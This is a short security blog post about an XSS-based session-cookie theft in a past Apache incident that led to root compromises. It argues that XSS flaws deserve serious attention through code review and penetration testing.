XSS is Alive and Well

First off, I would like to commend Apache for their detailed, well written disclosures of security breaches. Some organizations take the esoteric route even within the organization, sometimes going so far as immediately reimaging machines that have potentially been compromised without performing any forensic analysis to see what attacks were successful and if any sensitive information was compromised. In the spirit of full disclosure, Apache not only goes through the steps of analyzing exactly what happened, but also shares this information with the public.

Many companies, as well as vulnerability researchers, believe that Cross Site Scripting (XSS) vulnerabilities are all benign; the worst that will possibly happen to your site is an alert window announcing “Georgia is l33t!” However part of the recent attack on Apache that resulted in root compromises of machines within Apache was a result of exploited XSS vulnerabilities. The incident report reads like something out of The Web Application Hacker’s Handbook. The attack used a bug reporting web forum that was vulnerable to XSS. When a user clicked on the link included in the bug report an XSS attack grabbed the user’s session cookie. Given that post was related to a potential bug in Apache software, it isn’t hard to imagine why an unsuspecting administrator might click the link.

This incident just goes to show that even an organization with a strong security posture can fall victim to the dangers of XSS attacks. Code review and penetration testing of web applications should be in place to assess the risk of malicious XSS attacks compromising your company’s assets. XSS vulnerabilities should be taken just as seriously as more hyped web application vulnerabilities.